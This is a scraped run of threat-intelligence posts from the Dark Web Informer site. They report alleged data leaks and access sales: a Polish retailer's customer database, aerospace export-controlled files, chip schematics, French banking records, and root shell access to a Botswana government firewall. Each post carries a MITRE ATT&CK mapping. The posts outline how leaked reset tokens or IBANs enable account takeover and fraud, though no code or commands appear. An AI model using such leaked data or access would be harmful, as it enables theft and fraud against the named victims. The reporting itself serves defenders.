UTC Threat Actor lulzintel Victim VegeHome (vegehome.pl) Industry E-Commerce / Retail Category Data Breach Customers Exposed 100,000+ Platform PrestaShop Breach Date April 2026 Price Free (Public Leak) Network Open Web Severity High Country Poland ## Incident Overview A threat actor going by lulzintel has uploaded the full database of vegehome.pl, a Polish eco-friendly home products retailer. The actor states the breach occurred in April 2026 and exposed data belonging to over 100,000 customers. VegeHome's tagline "inspiracje mamy w naturze" (nature-inspired) positions it as an eco and natural lifestyle brand. The data was published as a free download for registered forum members. The leaked data comes from a PrestaShop installation (identified by the ps\_customer and ps\_mail table structures) and contains the following fields: - **Customer Identity**: Customer IDs, first names, last names, email addresses, gender IDs, and birthdays. - **Business Details**: Company names, SIRET numbers (French/EU business registration identifiers), and APE codes (business activity classification). This suggests VegeHome serves both individual consumers and business customers. - **Credentials and Security**: Hashed passwords (passwd field), last password generation timestamps, secure keys, password reset tokens, and password reset validity periods. The reset tokens and secure keys could allow account takeover if they are still valid. - **Account Metadata**: Shop group IDs, shop IDs, default group IDs, language IDs, risk IDs, newsletter subscription status, newsletter registration IPs, opt-in status, account creation dates, last update dates, active/deleted/guest flags, and notes. - **Financial Settings**: Outstanding allow amounts, show public prices flags, and max payment days, which are typically used for B2B customers with credit terms. - **Mail System**: A separate ps\_mail table with mail IDs, recipients, templates, subjects, language IDs, and timestamps, exposing the store's internal email communication records with customers. The combination of password reset tokens, secure keys, and hashed passwords makes this particularly actionable for attackers. If any reset tokens are still valid, they could be used for direct account takeover without needing to crack passwords. The B2B data (SIRET numbers, company names, payment terms) adds a business identity theft dimension beyond typical consumer e-commerce breaches. ## Compromised Data Categories Full Names Email Addresses Hashed Passwords Password Reset Tokens Secure Keys Birthdays Company Names & SIRET Numbers Newsletter & IP Data B2B Payment Terms Internal Mail Records Account Status & Metadata ## Image Preview [![Forum post by lulzintel uploading VegeHome.pl PrestaShop database with 100K+ customer records showing ps_customer SQL INSERT structure](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/728936498762349872635987234987232.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/728936498762349872635987234987232.png) [![VegeHome database sample data and ps_mail table structure with lulzintel branding](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/728936498762349872635987234987233.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/728936498762349872635987234987233.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the PrestaShop e-commerce platform to gain unauthorized access to the production database containing customer records and internal mail data. ](https://attack.mitre.org/techniques/T1190/) [ T1555 Credentials from Password Stores Extracts hashed passwords, password reset tokens, secure keys, and password validity periods for 100,000+ customer accounts, enabling account takeover and credential stuffing attacks. ](https://attack.mitre.org/techniques/T1555/) [ T1213 Data from Information Repositories Extracts the complete PrestaShop database including customer profiles, B2B company details with SIRET numbers, account metadata, and internal mail communication records. ](https://attack.mitre.org/techniques/T1213/) [ T1567 Exfiltration Over Web Service Publishes the stolen e-commerce database as a free download on web forums, gated behind forum registration, with SQL dump samples provided publicly. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Selling 70GB of ITAR-Controlled SEKISUI Aerospace Technical Data Including Boeing 737/787 Tooling, STEP Files, and Military Program Schematics for $200,000 URL: https://darkwebinformer.com/threat-actor-selling-70gb-of-itar-controlled-sekisui-aerospace-technical-data-including-boeing-737-787-tooling-step-files-and-military-program-schematics-for-200-000/ Last updated: 2026-04-13T14:58:17.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling 70GB of ITAR-Controlled SEKISUI Aerospace Technical Data Including Boeing 737/787 Tooling, STEP Files, and Military Program Schematics for $200,000 April 13, 2026 - 3:36:21 AM UTC United States / Japan Aerospace / Defense Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-13 03:36:21 UTC Threat Actor nxe Victim SEKISUI Aerospace Corporation Industry Aerospace / Defense Category Data Breach / IP Sale Data Size 70 GB Export Control EAR 9E991 / ITAR Aircraft Programs Boeing 737 MAX, 787 End Customers Boeing, Lockheed Martin, NASA, Northrop Grumman Price $200,000 (Negotiable) Severity Critical Country United States / Japan ## Incident Overview A threat actor going by nxe is selling 70GB of export-controlled technical data allegedly from SEKISUI Aerospace Corporation, the U.S. subsidiary of SEKISUI Chemical Japan. SEKISUI Aerospace is a Tier 1 direct supplier for Boeing 737 and 787 programs, Spirit AeroSystems, Triumph Group, and multiple U.S. military programs. The company specializes in advanced composite structures, precision assembly tooling, and thermoplastic components and welding used in fuselage, wing, keel beam, and interior structures. Named end customers include Boeing Commercial, Boeing Defense, NASA, Lockheed Martin, and Northrop Grumman. All drawings and models in the package are marked "EXPORT CONTROLLED: EAR 9E991 / ITAR Technical Data," meaning none of the material can legally be exported from the United States without an approved BIS or DDTC license. The sale of this data on a public forum constitutes a potential violation of U.S. export control law regardless of who purchases it. The actor states the data was previously sold exclusively to them as a one-time sale, and they are now reselling it. The 70GB technical data package contains: - **Engineering Drawings**: Technical PDF files with full production engineering documentation. - **CAD Files**: Complete STEP files in AP242 format, compatible with CATIA V5-6R2022 and SolidWorks 2018 through 2024. - **Bills of Materials**: Full BOMs with authentic Boeing part numbers. - **Tooling and Fixture Data**: Production tooling for Boeing 737 MAX Keel Skin Splice Strap, Boeing 787 Section 41 Nose, and interior panel assemblies. - **Material Specifications**: Details for carbon fiber prepreg, thermoplastic PEI and PPS, aluminum 6061-T6, and titanium inserts. - **Precision Tolerances**: Tolerances down to plus/minus 0.0005 inch with GD&T in accordance with ASME Y14.5. - **3D Assembly Models**: Three-dimensional models of assembly tools including drill jigs, trim fixtures, bonding fixtures, and all related bushings and locator hardware with real Carr Lane and McMaster-Carr part numbers. - **Process Specifications**: Boeing BAC-compliant process specification documents. The actor describes this as production-level technical data from an active Boeing supply chain partner. The price is $200,000 USD and negotiable, with escrow required, samples available upon proof of funds, and contact via Telegram. The specificity of the listing is notable: naming exact aircraft assemblies (737 MAX Keel Skin Splice Strap, 787 Section 41 Nose), exact CAD compatibility versions, exact material grades, exact tolerance standards, and exact hardware supplier part numbers (Carr Lane, McMaster-Carr) suggests genuine familiarity with aerospace manufacturing data rather than fabricated claims. ## Compromised Data Categories ITAR / EAR Export-Controlled Data Engineering Drawings (PDF) STEP / CAD Files (AP242) Boeing Part Numbers & BOMs 737 MAX Tooling Data 787 Section 41 Nose Data Composite Material Specifications GD&T / ASME Y14.5 Tolerances 3D Assembly Tool Models Boeing BAC Process Specs Military Program Data Supplier Hardware Part Numbers ## Image Preview [![Forum post by nxe selling 70GB of ITAR-controlled SEKISUI Aerospace technical data including Boeing 737 MAX and 787 tooling, STEP files, BOMs, material specs, and military program documentation for $200,000](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/78943567892658972659872635987239782.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/78943567892658972659872635987239782.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1213 Data from Information Repositories Extracts 70GB of production-level technical data from the aerospace supplier's engineering systems including CAD files, BOMs, process specifications, and tooling documentation. ](https://attack.mitre.org/techniques/T1213/) [ T1199 Trusted Relationship Compromises a Tier 1 Boeing supply chain partner to access production data for Boeing 737 MAX, 787, and military programs, exploiting the trusted supplier relationship. ](https://attack.mitre.org/techniques/T1199/) [ T1005 Data from Local System Collects engineering drawings, STEP/CAD files, Bills of Materials, material specifications, and 3D assembly tool models directly from production engineering systems. ](https://attack.mitre.org/techniques/T1005/) [ T1560 Archive Collected Data Packages 70GB of export-controlled aerospace technical data for sale, with samples available upon proof of funds and transaction conducted through escrow. ](https://attack.mitre.org/techniques/T1560/) [ T1657 Financial Theft Monetizes stolen defense contractor IP at a $200,000 asking price, representing both industrial espionage value and potential national security implications for ITAR-controlled data. ](https://attack.mitre.org/techniques/T1657/) [ T1567 Exfiltration Over Web Service Advertises the export-controlled data on public forums and conducts sales through Telegram, with escrow required and proof of funds needed before sample access. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### News Feed 2.0 URL: https://darkwebinformer.com/news-feed/ Last updated: 2026-07-14T22:50:10.000Z _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Saskatoon Man Charged With Darknet Drug Trafficking After Police Seize Crypto, Narcotics and 130TB of Data URL: https://darkwebinformer.com/saskatoon-man-charged-with-darknet-drug-trafficking-after-police-seize-crypto-narcotics-and-130tb-of-data/ Last updated: 2026-04-09T21:49:54.000Z [Saskatoon police have arrested](https://www.ctvnews.ca/saskatoon/article/saskatoon-man-arrested-for-dark-web-drug-trafficking-investigation/) a 30-year-old man suspected of selling drugs through darknet marketplaces, seizing cryptocurrency, narcotics and a large volume of digital storage in the process. Officers from the Cybercrime Unit, Digital Forensics Unit and patrol carried out a search warrant at a home on Bateman Crescent around 10 a.m. on March 31\. The operation was part of an ongoing investigation into drug trafficking on multiple darknet platforms. During the search, police confiscated quantities of Xanax and MDMA, along with cryptocurrency holdings across three platforms, roughly 0.447 Bitcoin, 0.007895 Ether and 0.0989 Binance Coin. Investigators also seized approximately 130 terabytes of data storage and assorted computer equipment. The man faces charges of trafficking controlled substances and possession of proceeds of crime exceeding $5,000\. Police say the investigation remains active. ### Bitcoin Depot Inc. has Filed Form 8-K Due to a Cybersecurity Incident URL: https://darkwebinformer.com/bitcoin-depot-inc-has-filed-form-8-k-due-to-a-cybersecurity-incident/ Last updated: 2026-04-09T22:07:32.000Z On March 23, 2026, Bitcoin Depot Inc. (the “Company”) discovered that an unauthorized party gained access to certain of its information technology systems. Upon detection, the Company promptly activated its incident response protocols, engaged external cybersecurity experts, and notified law enforcement. Based on the Company’s investigation to date, the unauthorized actor gained access to certain systems and obtained control of credentials associated with the Company’s digital asset settlement accounts. As a result, the unauthorized actor transferred approximately 50.903 Bitcoin from Company-controlled wallets, valued at approximately $3.665 million as of the date of this report, without authorization. The Company further believes that the incident was contained to the Company’s corporate environment and did not affect the Company’s customer platforms, divisions, systems, data or environments. The Company continues to investigate the nature and scope of the incident with the assistance of third-party specialists. As part of its remediation efforts, the Company is working with its outside cybersecurity experts to further reinforce its information technology systems and to prevent future unauthorized access. The Company has not identified evidence that customer personally identifiable information was accessed or exfiltrated in connection with the incident; however, the investigation remains ongoing. As of the date of this Current Report on Form 8-K, the incident has not had a material impact on the Company’s operations. On April 6, 2026, the Company nevertheless determined that the incident is material in light of potential consequences of the incident, including reputations harm, legal, regulatory and response costs. The Company believes that the incident is not reasonably likely to have a material impact on the Company’s financial condition or results of operations but has not yet determined the full impact of the incident. The Company has recorded a preliminary estimate of loss of approximately $3.665 million, representing the fair value of the Bitcoin transferred without authorization as of the date of the incident. The ultimate impact may differ from this estimate as the investigation continues. The Company maintains insurance coverage that may cover certain losses associated with cybersecurity incidents, but there can be no assurance that such coverage will be sufficient to recover any or all losses incurred as a result of this incident. As the investigation of the incident is ongoing, the full scope, nature and impact of the incident are not yet completely known. To the extent any information required by Item 1.05(a) of Form 8-K was not determined or was unavailable at the time of this filing, the Company will amend this Current Report on Form 8-K as such information is determined or becomes available. Source: ### Alleged Breach of Shanghai Fudan Microelectronics Leaks 175MB of IC Schematics, Internal Documents, and Intellectual Property URL: https://darkwebinformer.com/alleged-breach-of-shanghai-fudan-microelectronics-leaks-175mb-of-ic-schematics-internal-documents-and-intellectual-property/ Last updated: 2026-04-08T17:46:19.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Shanghai Fudan Microelectronics Leaks 175MB of IC Schematics, Internal Documents, and Intellectual Property April 8, 2026 - 5:37:13 PM UTC China Semiconductor / Electronics Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-08 17:37:13 UTC Threat Actor s1ic3r Victim Shanghai Fudan Microelectronics Group Industry Semiconductor / Electronics Category Data Breach / IP Leak Data Size 175 MB (Compressed) Data Type Docs, Schematics, IP Breach Date April 2026 Price Free (Public Leak) Network Open Web Severity Critical Country China ## Incident Overview A threat actor going by s1ic3r has leaked 175MB of compressed documents, schematics, and intellectual property allegedly from Shanghai Fudan Microelectronics Group, Ltd. (commonly known as Fudan Micro or FMSH). Fudan Microelectronics is a major Chinese semiconductor company specializing in the design, development, and provision of systems solutions for very large-scale integrated circuits (VLSI). The company is publicly traded on the Shanghai Stock Exchange and is a significant player in China's domestic chip industry. The leaked data reportedly includes: - **Internal Documents**: Corporate documentation from the company's operations. - **Schematics**: Circuit designs and technical drawings for integrated circuit products. For a semiconductor company, schematics represent core intellectual property as they contain the detailed design of chip architectures, circuit layouts, and component specifications. - **Intellectual Property**: Broader proprietary technical data beyond schematics, potentially including design specifications, test data, process documentation, and product development materials. The leak of semiconductor schematics and IC design intellectual property from a major Chinese chipmaker carries significant implications. Fudan Micro products are used across smart cards, security chips, RFID, non-volatile memory, and general-purpose microcontrollers. Leaked schematics could enable competitors to reverse-engineer proprietary designs, identify hardware vulnerabilities in deployed chips (relevant for smart card and security chip applications), or gain insight into China's domestic semiconductor capabilities. ## Compromised Data Categories IC Schematics & Circuit Designs Internal Corporate Documents Proprietary Intellectual Property VLSI Design Data Semiconductor Product Details ## Image Preview [![Forum post by s1ic3r leaking 175MB of Shanghai Fudan Microelectronics documents, schematics, and intellectual property with Fudan Micro logo and Free IntelBroker message](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/293756782659269579231.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/293756782659269579231.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets the semiconductor company's infrastructure to gain access to internal systems containing proprietary IC designs, schematics, and corporate documentation. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts internal documents, circuit schematics, and intellectual property from the company's document management and engineering systems. ](https://attack.mitre.org/techniques/T1213/) [ T1560 Archive Collected Data Packages the stolen semiconductor IP into a 175MB compressed, password-protected archive for free distribution through web forums. ](https://attack.mitre.org/techniques/T1560/) [ T1567 Exfiltration Over Web Service Distributes the leaked intellectual property as a free download with a publicly shared password, maximizing exposure of proprietary semiconductor designs. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - April 7th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-7th-2026/ Last updated: 2026-04-07T21:36:08.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Alleged Breach of KBank Vietnam Exposes 10.1 Million Credit Registration Records With National IDs, Salaries, Credit Scores, and Employer Details](#) FREE ❗️ [CVE-2026-35616: FortiClient EMS Pre-Auth API Bypass Under Active Exploitation](#) FREE ❗️ [Alleged Breach of Colombia's Huila Department Government Extranet Exposes Officer Data, Municipal Offices, and Government Operations Across 8 Municipalities](#) FREE ❗️ [Threat Actor Selling Root RCE Shell Access to Botswana Government Health Portal Firewall for $300](#) FREE ❗️ [Threat Actor Selling 1.2 Million French FICOBA Banking Leads With IBANs, SSNs, and Tax IDs From 15+ Banks](#) FREE X/Twitter Updates ❗️ [Forum IP Leak: ascarding\[.\]net](https://x.com/DarkWebInformer/status/2041323999884419565?s=20) ❗️ [The internal and confidential databases of Banco Agrario de Colombia, a state-owned Colombian bank, have allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2041524426601046185?s=20) ❗️ [Threat actor Lvn4t1k0 allegedly leaked personal data from CONALEP Morelos including teacher information (RFC, CURP, Gmail, passwords, usernames, full names) and student credentials.](https://x.com/DarkWebInformer/status/2041532900013728241?s=20) ❗️ [A threat actor claims to possess over 609,000 email records from Hisense USA obtained through various registration forms including TV QR code registration, product registration, and customer support forms.](https://x.com/DarkWebInformer/status/2041539607506850090?s=20) ❗️ [A threat actor claims to have obtained databases from Plan Ceibal, a Uruguayan government technology agency, affecting 1.2 million users of the CREA social network and 1 million citizens device assignment records.](https://x.com/DarkWebInformer/status/2041546009445023865?s=20) ❗️ [Threat actor JINKUSU advertises OMNITRIX IMAP service offering email account monitoring, attachment interception, IBAN replacement in documents, and email editing capabilities via IMAP access.](https://x.com/DarkWebInformer/status/2041558875334439307?s=20) ❗️ [Threat actor McLovin is selling a database containing 810 million Chinese shopping delivery addresses for $1000.](https://x.com/DarkWebInformer/status/2041565518851682546?s=20) ❗️ [Threat actor OnarDev is allegedly selling a dataset containing personal information of 2 million Coinbase users for $500 USD.](https://x.com/DarkWebInformer/status/2041566096000508026?s=20) ❗️ [Threat actor McLovin is allegedly selling a database containing 4.6 million Robinhood Gold membership records for $3,190.](https://x.com/DarkWebInformer/status/2041567068256964780?s=20) ❗️ [NyxarGroup and collaborators are allegedly selling personal information from Colombian government websites saul.cali.gov.co and sider.cali.gov.co.](https://x.com/DarkWebInformer/status/2041567797394768229?s=20) 💡 [This Hacker (IntelBroker) Kept Embarrassing the FBI](https://x.com/DarkWebInformer/status/2041574629454581769?s=20) ❗️ [The FBI has released a joint Cybersecurity Advisory on Iranian-Affiliated cyber actors exploiting programmable logic controllers across US critical infrastructure.](https://x.com/DarkWebInformer/status/2041580334261670350?s=20) 💡 [Tor Browser 15.0.9 has been released, update if you haven't already done so.](https://x.com/DarkWebInformer/status/2041584357823950983?s=20) ❗️ [CVE-2026-23398: Linux Kernel ICMP DoS Vulnerability](https://x.com/DarkWebInformer/status/2041605308229865596?s=20) ❗️ [CVE-2026-28286: ZimaOS Privilege Escalation Vulnerability](https://x.com/DarkWebInformer/status/2041611758402728416?s=20) 💡 [DOJ Disrupts Russian Military Intelligence DNS Hijacking Operation Through Court Order](https://x.com/DarkWebInformer/status/2041626968068628491?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Threat Actor Selling 1.2 Million French FICOBA Banking Leads With IBANs, SSNs, and Tax IDs From 15+ Banks URL: https://darkwebinformer.com/threat-actor-selling-1-2-million-french-ficoba-banking-leads-with-ibans-ssns-and-tax-ids-from-15-banks/ Last updated: 2026-04-07T19:28:37.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling 1.2 Million French FICOBA Banking Leads With IBANs, SSNs, and Tax IDs From 15+ Banks April 7, 2026 - 7:20:44 PM UTC France Banking / Financial Services Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-07 19:20:44 UTC Threat Actor bestdata Victim FICOBA / French Banking Sector Industry Banking / Financial Services Category Data Breach Total Records 1.2 Million Banks Affected 15+ Institutions Data Year 2026 Severity Critical Price Contact Seller Network Open Web Country France ## Incident Overview A threat actor going by bestdata claims to be selling a 1.2 million record dataset described as French FICOBA banking leads. FICOBA (Fichier des Comptes Bancaires et Assimilés) is France's national registry of bank accounts maintained by the French tax authority, which records every bank account opened in France along with the account holder's identity. If this dataset is genuinely sourced from or mirrors FICOBA data, it represents one of the most sensitive French financial datasets possible. The listing names the following banks whose customers appear in the dataset: BNP Paribas, Societe Generale, Credit Lyonnais (LCL), Credit Agricole (multiple regional banks), Caisse d'Epargne, Credit Mutuel, CIC, Banque Populaire, AXA Banque, Boursorama, Revolut, Monabanq, Carrefour Banque, HSBC, Allianz Banque, BRED, BforBank, and many other regional institutions. The data fields per record are extensive: - **Identity**: Full names, dates of birth, birth city and department, territory classification. - **Government Identifiers**: Social security numbers and tax identifiers (SPI, the French tax reference number). - **Banking Details**: IBANs, BIC/SWIFT codes, bank names, bank branch information, account types, and account nature. - **Contact Information**: Phone numbers, email addresses, main addresses, and possible secondary addresses. - **Family Data**: Relatives information including names and birthdates of family members. - **Credentials**: Possible password fields are listed, though the scope of this field is unclear. The sample record shows a structured format with distinct Identity, Contact, and Address sections, including a specific individual's name, date of birth, Paris arrondissement of birth, department number, territory, and phone number. The combination of IBANs, social security numbers, tax identifiers, and full identity details across 15+ banks makes this a complete financial identity theft package. An attacker with this data could initiate fraudulent SEPA transfers, file false tax returns, open accounts in victims' names, or conduct highly targeted social engineering against specific bank customers. ## Compromised Data Categories Full Names Dates of Birth Birth City & Department Social Security Numbers Tax Identifiers (SPI) IBANs BIC / SWIFT Codes Bank Names & Branch Info Account Types & Nature Phone Numbers Email Addresses Main & Secondary Addresses Relatives (Names & Birthdates) Possible Passwords ## Image Preview [![Forum post by bestdata selling 1.2 million French FICOBA banking leads with data fields listing, affected banks including BNP Paribas, Societe Generale, Credit Agricole, and 15+ other institutions](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/32759287357892356789239872.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/32759287357892356789239872.png) [![Sample FICOBA record showing structured identity, contact, and address sections with Paris arrondissement birth details and phone number](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/32759287357892356789239873.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/32759287357892356789239873.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1589.001 Gather Victim Identity: Credentials Harvests IBANs, social security numbers, tax identifiers, and possible passwords for 1.2 million French banking customers across 15+ financial institutions. ](https://attack.mitre.org/techniques/T1589/001/) [ T1213 Data from Information Repositories Extracts structured banking records from what appears to be a FICOBA-format dataset, pulling account details, personal identifiers, and financial data across France's banking sector. ](https://attack.mitre.org/techniques/T1213/) [ T1657 Financial Theft The combination of IBANs, BIC/SWIFT codes, and full identity details enables direct financial fraud including fraudulent SEPA transfers, tax return fraud, and account impersonation. ](https://attack.mitre.org/techniques/T1657/) [ T1567 Exfiltration Over Web Service Advertises and sells the French banking dataset through web forums, with serious inquiries directed to a Telegram handle for pricing and sample verification. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Selling Root RCE Shell Access to Botswana Government Health Portal Firewall for $300 URL: https://darkwebinformer.com/threat-actor-selling-root-rce-shell-access-to-botswana-government-health-portal-firewall-for-300/ Last updated: 2026-04-07T19:27:37.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling Root RCE Shell Access to Botswana Government Health Portal Firewall for $300 April 7, 2026 - 4:52:21 PM UTC Botswana Government / Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-07 16:52:21 UTC Threat Actor Florence (Nightmare) Victim Botswana Government Health Portal Industry Government / Healthcare Category Initial Access Sale Access Level Root RCE + Shell Device Type Firewall Operating System Linux Revenue Unknown Price $300 (Non-Negotiable) Severity Critical Country Botswana ## Incident Overview A threat actor going by Florence, associated with the Nightmare group, is selling root-level remote code execution and shell access to a firewall device on the Botswana Government Health Portal. The listing is brief but the access being offered is the most dangerous type available: root RCE on a network security appliance protecting government healthcare infrastructure. The listing specifies the following technical details: - **Operating System**: Linux, indicating a Linux-based firewall appliance (common in government deployments, potentially a Fortinet, Palo Alto, Sophos, or similar device running a Linux-based OS). - **Device Type**: Firewall, meaning the compromised device sits at the network perimeter and controls traffic flow into and out of the health portal's infrastructure. - **Access Level**: Root RCE + Shell, providing the highest possible privilege level on the device with the ability to execute arbitrary commands, modify firewall rules, intercept traffic, and pivot deeper into the network. - **Revenue**: Listed as unknown, which is typical for government targets where revenue isn't publicly reported. Root access to a firewall on a government health portal is particularly dangerous because it provides a position to intercept all network traffic flowing through the device, disable security controls to allow further intrusion, pivot into internal health systems that may contain patient records and sensitive health data, deploy persistent backdoors at the network perimeter level, and modify access rules to allow additional attackers in. The price is fixed at $300 and described as non-negotiable, with contact exclusively through Session messaging. ## Access & Risk Categories Root Shell Access Remote Code Execution Firewall Device Control Network Perimeter Access Traffic Interception Capability Government Health Infrastructure Lateral Movement Potential ## Image Preview [![Forum post by Florence selling root RCE shell access to Botswana Government Health Portal firewall for $300 with Nightmare group branding](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/37895698725697826592678359785964782.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/37895698725697826592678359785964782.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application The firewall is an internet-facing network device that was likely compromised through a known vulnerability to gain root-level remote code execution. ](https://attack.mitre.org/techniques/T1190/) [ T1059.004 Command and Scripting: Unix Shell Root shell access on the Linux-based firewall allows execution of arbitrary commands, system configuration changes, and deployment of additional tools or backdoors. ](https://attack.mitre.org/techniques/T1059/004/) [ T1040 Network Sniffing Root access on the firewall enables interception and inspection of all network traffic flowing through the device, potentially capturing credentials, health data, and internal communications. ](https://attack.mitre.org/techniques/T1040/) [ T1562.004 Impair Defenses: Disable or Modify Firewall Root access to the firewall itself allows an attacker to modify or disable security rules, open ports, whitelist attacker IPs, or completely disable filtering to allow unrestricted access to internal systems. ](https://attack.mitre.org/techniques/T1562/004/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of 